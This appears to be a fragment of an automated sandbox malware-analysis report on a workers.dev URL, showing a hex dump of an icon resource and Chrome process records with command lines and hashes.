                                                                      2024-03-28 23:21:21 UTC1533INData Raw: 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22
                                                                      Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333""


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:00:20:57
                                                                      Start date:29/03/2024
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                      Imagebase:0x7ff76e190000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:2
                                                                      Start time:00:20:59
                                                                      Start date:29/03/2024
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1756,i,15801424558716426216,5039533989991988249,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                      Imagebase:0x7ff76e190000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:3
                                                                      Start time:00:21:01
                                                                      Start date:29/03/2024
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://portal.bakfar.workers.dev/"
                                                                      Imagebase:0x7ff76e190000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      No disassembly